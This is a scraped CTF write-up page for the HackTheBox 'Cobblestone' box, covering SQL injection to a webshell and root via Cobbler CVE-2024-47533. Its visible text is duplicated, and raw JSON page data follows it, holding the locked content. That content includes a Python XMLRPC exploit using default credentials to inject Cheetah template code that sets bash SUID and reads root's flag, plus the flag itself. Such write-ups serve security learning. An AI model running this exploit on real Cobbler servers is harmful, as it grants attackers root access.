Home/HTB/Cobblestone — HTB Box Writeup
HTB

Cobblestone — HTB Box Writeup

retleave·Apr 21, 2026·7 min read

Cobblestone - HTB Box

Info

  • Type: Box (HackTheBox)
  • OS: Linux (Debian 12)
  • IP: 10.129.232.170
  • Difficulty: Medium
  • Key Topics: SQL Injection, FILE privilege abuse, Cobbler XMLRPC, Cheetah SSTI (CVE-2024-47533)

Abstract

Cobblestone is a medium-difficulty Linux box featuring a multi-stage attack chain. Initial access begins with a UNION-based SQL injection on a voting application that, combined with the MySQL FILE privilege, allows writing a webshell to disk. Credential harvesting from the database leads to SSH access as the cobble user inside a restricted shell. Privilege escalation exploits CVE-2024-47533 in Cobbler 3.3.06 -- a server-side template injection (SSTI) in the Cheetah templating engine triggered through the XMLRPC API. This writeup examines each stage in depth, with particular focus on the Cobbler exploitation path, which requires careful setup of distros, profiles, and autoinstall templates to achieve code execution as root.

Reconnaissance

Port Scanning

The target exposes only two services:
  • 22/tcp -- SSH (OpenSSH 9.2p1 Debian)
  • 80/tcp -- HTTP (Apache 2.4.62)

Virtual Host Discovery

Three virtual hosts were identified through enumeration:
VHostPurpose
cobblestone.htbSkins application (download.php, suggest_skin.php, upload.php)
vote.cobblestone.htbVoting application (login, register, suggest URL)

Content Locked

This challenge is still active on HackTheBox. The full writeup will be available after retirement.

Home/HTB/Cobblestone — HTB Box Writeup
HTB

Cobblestone — HTB Box Writeup

retleave·Apr 21, 2026·7 min read

Cobblestone - HTB Box

Info

  • Type: Box (HackTheBox)
  • OS: Linux (Debian 12)
  • IP: 10.129.232.170
  • Difficulty: Medium
  • Key Topics: SQL Injection, FILE privilege abuse, Cobbler XMLRPC, Cheetah SSTI (CVE-2024-47533)

Abstract

Cobblestone is a medium-difficulty Linux box featuring a multi-stage attack chain. Initial access begins with a UNION-based SQL injection on a voting application that, combined with the MySQL FILE privilege, allows writing a webshell to disk. Credential harvesting from the database leads to SSH access as the cobble user inside a restricted shell. Privilege escalation exploits CVE-2024-47533 in Cobbler 3.3.06 -- a server-side template injection (SSTI) in the Cheetah templating engine triggered through the XMLRPC API. This writeup examines each stage in depth, with particular focus on the Cobbler exploitation path, which requires careful setup of distros, profiles, and autoinstall templates to achieve code execution as root.

Reconnaissance

Port Scanning

The target exposes only two services:
  • 22/tcp -- SSH (OpenSSH 9.2p1 Debian)
  • 80/tcp -- HTTP (Apache 2.4.62)

Virtual Host Discovery

Three virtual hosts were identified through enumeration:
VHostPurpose
cobblestone.htbSkins application (download.php, suggest_skin.php, upload.php)
vote.cobblestone.htbVoting application (login, register, suggest URL)

Content Locked

This challenge is still active on HackTheBox. The full writeup will be available after retirement.

. Critically, Cheetah templates can execute arbitrary Python code using `#set` directives.\n\nThe vulnerability exists in the `generate_profile_autoinstall()` XMLRPC method. When this method is called, Cobbler:\n\n1. Retrieves the profile's associated autoinstall template\n2. Renders the template through the Cheetah engine\n3. Returns the rendered output\n\nBecause the XMLRPC API allows authenticated users to **write** autoinstall templates via `write_autoinstall_template()`, an attacker with valid credentials can inject arbitrary Python code into a template and trigger its execution by calling `generate_profile_autoinstall()`.\n\nThe key distinction is that `generate_profile_autoinstall()` (profile-level) triggers the full Cheetah render pipeline, while `generate_autoinstall()` (system-level) has slightly different code paths. The profile variant is the reliable exploitation target.\n\n### Exploitation Requirements\n\nFor the template rendering to succeed, the profile must reference a valid distro, and the distro must have a **kernel path that actually exists on the filesystem**. If the kernel file does not exist, Cobbler raises an error before reaching the template rendering stage.\n\nWe can discover valid kernel paths using the webshell or by guessing standard Debian paths:\n\n```\n/boot/vmlinuz-6.1.0-37-amd64\n/boot/initrd.img-6.1.0-37-amd64\n```\n\n### Exploitation Script\n\n```python\nimport xmlrpc.client\n\ns = xmlrpc.client.ServerProxy('http://127.0.0.1:25151')\ntoken = s.login('cobbler', 'cobbler')\n\n# Step 1: Create a distro with real kernel paths\n# The kernel must exist on disk or Cobbler refuses to render templates\ndid = s.new_distro(token)\ns.modify_distro(did, 'name', 'pwndistro', token)\ns.modify_distro(did, 'arch', 'x86_64', token)\ns.modify_distro(did, 'breed', 'redhat', token)\ns.modify_distro(did, 'kernel', '/boot/vmlinuz-6.1.0-37-amd64', token)\ns.modify_distro(did, 'initrd', '/boot/initrd.img-6.1.0-37-amd64', token)\ns.save_distro(did, token)\n\n# Step 2: Create a profile linked to the distro\npid = s.new_profile(token)\ns.modify_profile(pid, 'name', 'pwnprofile', token)\ns.modify_profile(pid, 'distro', 'pwndistro', token)\n\n# Step 3: Write a malicious Cheetah template\n# #set executes Python code during template rendering\n# __import__(\"os\").system() runs shell commands as the Cobbler process (root)\npayload = '#set $null = __import__(\"os\").system(\"chmod u+s /usr/bin/bash\")\\n'\ns.write_autoinstall_template('pwn.ks', payload, token)\ns.modify_profile(pid, 'autoinstall', 'pwn.ks', token)\ns.save_profile(pid, token)\n\n# Step 4: Trigger the render -- this executes the payload as root\ns.generate_profile_autoinstall('pwnprofile')\n\n# Alternative: read the flag directly via template output\npayload2 = '#set $out = __import__(\"os\").popen(\"cat /root/root.txt\").read()\\n$out\\n'\ns.write_autoinstall_template('pwn.ks', payload2, token)\nresult = s.generate_profile_autoinstall('pwnprofile')\nprint(result) # contains the flag\n```\n\nThe Cheetah `#set` directive evaluates the right-hand side as Python code. `__import__(\"os\")` dynamically imports the `os` module at render time, and `.popen()` or `.system()` executes commands with the privileges of the Cobbler daemon -- which is root.\n\n## Root Flag\n\n```\na4acfa73abfbe8e8550b30f6df44751f\n```\n\n## Key Takeaways\n\n- **FILE privilege in MySQL** transforms SQL injection into filesystem read/write. Always check `SHOW GRANTS` for the database user.\n- **Cobbler default credentials** (`cobbler:cobbler`) are a well-known attack vector. The XMLRPC API on port 25151 exposes the full management interface.\n- **CVE-2024-47533** exploits the Cheetah template engine's ability to execute Python code via `#set` directives. The critical method is `generate_profile_autoinstall()`, not `generate_autoinstall()`.\n- **Distro kernel paths must exist** on disk for profile rendering to succeed -- this is a non-obvious requirement that can stall exploitation.\n- **Cron cleanup jobs** create operational pressure during webshell usage. Plan your command chains in advance and execute them quickly.\n- **rbash restrictions** do not prevent SSH port forwarding, which is often sufficient to reach internal services.\n","excerpt":"[Insane] Full writeup of HackTheBox Cobblestone box: SQLi to webshell, rbash escape, and Cobbler CVE-2024-47533 Cheetah template injection for root.","categoryId":null,"authorName":"retleave","publishedAt":"2026-04-21T10:34:51.241990Z","createdAt":"2026-04-21T10:34:51.241990Z","updatedAt":"2026-04-21T10:34:51.241990Z","isDraft":0,"previewImageId":38,"isLocked":1,"tags":[{"id":11,"name":"box","slug":"box"},{"id":19,"name":"privesc","slug":"privesc"},{"id":20,"name":"sqli","slug":"sqli"},{"id":23,"name":"pentest","slug":"pentest"},{"id":25,"name":"rce","slug":"rce"}],"categories":[{"id":13,"name":"HTB","slug":"htb"}],"category":null,"previewImage":{"id":38,"filename":"box.png","originalName":"htb-box-preview.png","mimeType":"image/png","size":12555,"uploadedAt":"2026-04-21T13:24:51.363193+00:00","thumbnailUrl":"/uploads/box.png","mediumUrl":"/uploads/box.png","largeUrl":"/uploads/box.png","width":1200,"height":630},"categoryName":null},"categories":[{"id":10,"name":"Research","slug":"research","description":"Original security research, vulnerability analysis, and technical deep dives","createdAt":"2026-01-25T15:39:51.891Z","categoryOrder":0},{"id":12,"name":"Drafts","slug":"drafts","description":"Work in progress articles and draft content under development","createdAt":"2026-01-25T15:39:51.906Z","categoryOrder":1},{"id":13,"name":"HTB","slug":"htb","description":"HackTheBox writeups — boxes and challenges","createdAt":"2026-04-21 10:34:19","categoryOrder":3}],"type":"article"}